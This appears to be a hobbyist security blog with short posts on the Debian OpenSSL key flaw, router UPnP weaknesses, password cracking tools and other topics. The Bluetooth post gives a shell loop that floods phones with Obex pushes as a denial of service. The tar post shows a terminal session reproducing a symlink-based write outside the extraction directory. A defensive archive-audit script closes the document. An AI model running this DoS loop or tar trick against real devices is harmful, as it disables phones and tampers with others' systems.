security

Debian 'fixes' OpenSSL


So it would appear that Debian "fixed" a problem in OpenSSL a few years ago. Unfortunately this "fix" has meant that they have had to release this security announcement.

Now this vulnerability is quite bad, so much so that Debian have stated the following:

It is strongly recommended that all cryptographic key material which has been generated by OpenSSL versions starting with 0.9.8c-1 on Debian systems is recreated from scratch. Furthermore, all DSA keys ever used on affected Debian systems for signing or authentication purposes should be considered compromised; the Digital Signature Algorithm relies on a secret random value used during signature generation.

Ben Laurie has posted a great blog entry as to why this is so stupid. This quote from that entry sums the problem up nicely:

Secondly, if you are going to fix bugs, then you should install this maxim of mine firmly in your head: never fix a bug you don’t understand.

Hacking BT Home Hubs


So first we have the BT Voyager that gave out your username and password if you asked it nicely.

Then, yet again, BT ship a router with another flaw in it.

I've always had this gut feeling that UPnP was bad. It allows machines on your network to modify, for example, settings on your router without any authentication.

Password Analysis


After a recent phishing scam, which resulted in someone gaining over 55,000 passwords for MySpace, someone has posted some analysis on the passwords.

See the results here

Kernel Sorted


Upgrading my kernel to 2.6.18 appears to have fixed the issue I was having with aircrack.

Now just need to write a script to make things a bit easier.

Aircrack


Finally got a 1/2 decent wireless card that will do packet injection.

All I need to do is wait for my kernel to compile again to remove SMP support. At which point I can get on with this tutorial.

Ophcrack


I've yet to _really_ understand Rainbow Tables but this article gives a good overview on the subject.

Using this concept Ophcrack allows you to recover passwords from Windows-based machines very quickly (we are talking single figure minutes at the most here) by exploiting the fact that, by default, Windows uses saltless hashes for passwords.

The iso is downloading at the moment and will be put to good use ;)

Suspect Nation


[Watch on youtube]

Well worth watching if you are at all interested in security.

It's a documentary on the "Security" measures that the British government are putting in place, making you think about whether they are really a "good thing".

For hard core tech people, features include:

  • RFID Exploits (including UK Passports)
  • CCTV Security
  • Wireless Security
  • Mobile Phone exploits

Enjoy!

Bluetooth Obex DoS


DoS your mobile phone with lots of Obex pushes. It would seem that most mobiles force you to either accept or deny the push; this disables any other usage of the phone, including the ability to turn off Bluetooth.

This has apparently been confirmed on the following phones:

  • Sony Ericsson K700i
  • Nokia N70
  • Motorola MOTORAZR V3
  • Sony Ericsson W810i
  • LG Chocolate KG800

No doubt many other phones are affected.

Attached is the current release of the ussp-push program which uses the BlueZ Bluetooth stack to do an Obex push.

All that is required is a wrapper script of the form:

while true
do
        ./ussp-push $MAC@$OCHAN $FILENAME $FILENAME
done

You can work the rest out yourself...

tar exploit in the wild


Just when you thought you were safe...

http://lists.grok.org.uk/pipermail/full-disclosure/2006-November/050812.html

Have tested this and it works as described:

nathan@holly /tmp $ tar --version
tar (GNU tar) 1.15.1
nathan@holly /tmp $ ~/tmp/tarxyz > foo.tar
nathan@holly /tmp $ mkdir -p xyz/home/foo
nathan@holly /tmp $ echo "Hello" > xyz/home/foo/hello.txt
nathan@holly /tmp $ tar -rf foo.tar xyz/home/foo
nathan@holly /tmp $ rootdo mkdir /home/foo
nathan@holly /tmp $ rootdo chown nathan /home/foo
nathan@holly /tmp $ rm -rf xyz
nathan@holly /tmp $ tar -xf foo.tar
nathan@holly /tmp $ ls -l xyz
lrwxrwxrwx 1 nathan users 1 Nov 22 00:03 xyz -> /
nathan@holly /tmp $ cat /home/foo/hello.txt
Hello
nathan@holly /tmp $ 
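
A pre-extraction audit for the end state the session above shows (a link `xyz -> /` with later members stored under `xyz/`), as an added example that is not from the original post or the linked advisory. It assumes the link is an ordinary symlink or hardlink member that Python's `tarfile` can see; `audit_tar`, `build_sample` and the in-memory sample archive are constructed for illustration.

```python
import io
import posixpath
import tarfile


def audit_tar(fileobj):
    """Return (member, reason) findings for an archive without extracting it."""
    findings = []
    links = {}  # normalised link path -> link target, in archive order
    with tarfile.open(fileobj=fileobj, mode="r:*") as tar:
        for m in tar:
            name = posixpath.normpath(m.name)
            parts = name.split("/")
            # Absolute names or names climbing with ".." leave the extraction dir.
            if name.startswith("/") or ".." in parts:
                findings.append((m.name, "path escapes extraction directory"))
            # A proper prefix that an earlier member defined as a link means
            # this member would be written through that link.
            prefixes = ["/".join(parts[:i]) for i in range(1, len(parts))]
            via = next((p for p in prefixes if p in links), None)
            if via is not None:
                findings.append((m.name, f"written through link {via} -> {links[via]}"))
            if m.issym() or m.islnk():
                target = m.linkname
                if target.startswith("/") or ".." in target.split("/"):
                    findings.append((m.name, f"link points outside: {target}"))
                links[name] = target
    return findings


def build_sample():
    """Constructed sample mirroring the listing: xyz -> /, then a file under xyz/."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w") as tar:
        link = tarfile.TarInfo("xyz")
        link.type = tarfile.SYMTYPE
        link.linkname = "/"
        tar.addfile(link)
        data = b"Hello\n"
        info = tarfile.TarInfo("xyz/home/foo/hello.txt")
        info.size = len(data)
        tar.addfile(info, io.BytesIO(data))
    buf.seek(0)
    return buf


if __name__ == "__main__":
    for member, reason in audit_tar(build_sample()):
        print(f"{member}: {reason}")
```

Running the audit on untrusted archives before `tar -xf`, and extracting as an unprivileged user into an empty directory, limits what a link planted by the archive can reach.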